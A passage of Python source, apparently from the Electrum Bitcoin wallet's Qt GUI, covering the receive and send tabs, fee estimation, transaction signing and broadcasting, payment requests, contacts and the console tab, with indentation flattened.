_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
try:
addr = self.wallet.get_receiving_address() or ''
except InternalAddressCorruption as e:
self.show_error(str(e))
addr = ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
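# Regenerate the payment URI and QR code whenever the receive address, amount or
# description changes, and mirror it into the detached QR window if one is open.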
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_bip21_uri(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(self.amount_e.width())
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(self.amount_e.width())
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(self.amount_e.width())
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
self.show_message(title=_('Fee rounding'), msg=text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit()))
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
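# Recolour the amount, fee and feerate fields: red when there are not enough funds,
# blue for values that were auto-filled rather than typed by the user (as determined
# by the isModified() checks below).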
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
return
outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
coins, outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
self.logger.exception('')
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.max_button.isChecked():
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
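# A visible fee field that the user has edited by hand (isModified) is treated as
# "frozen": do_update_fee keeps the entered value instead of recomputing it.
# is_send_feerate_frozen below applies the same rule to the feerate field.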
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
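# Returns either an absolute fee amount (when the fee field is frozen), a fee-estimator
# callable built from the frozen feerate (converted from sat/byte to sat/kilobyte),
# or None to let the wallet choose the fee itself.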
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def check_send_tab_outputs_and_show_errors(self, outputs) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.address is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Bitcoin Address'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
if self.check_send_tab_outputs_and_show_errors(outputs):
return
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
self.logger.exception('')
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
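# Broadcasting runs in a background thread via WaitingDialog. On success the txid is
# reported back to the GUI thread; if the payment originated from a BIP70 request, the
# invoice is marked as paid and a payment ACK exchange with the merchant is attempted.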
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture the current top-level window now; the modal override may already be
# removed by the time the broadcast thread returns
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
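# Handle a payment URI. If it references a BIP70 request (an 'r' URL, or an embedded
# 'name' + 'sig'), the request is resolved via the on_pr callback passed to
# util.parse_URI; otherwise the address, amount and description are filled into the
# send tab directly.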
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
f.write(pr.raw)
self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
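# Wrap each Commands method in its own closure; binding 'method' through this helper's
# parameter avoids the classic late-binding pitfall of defining the lambda directly
# inside the loop below.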
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
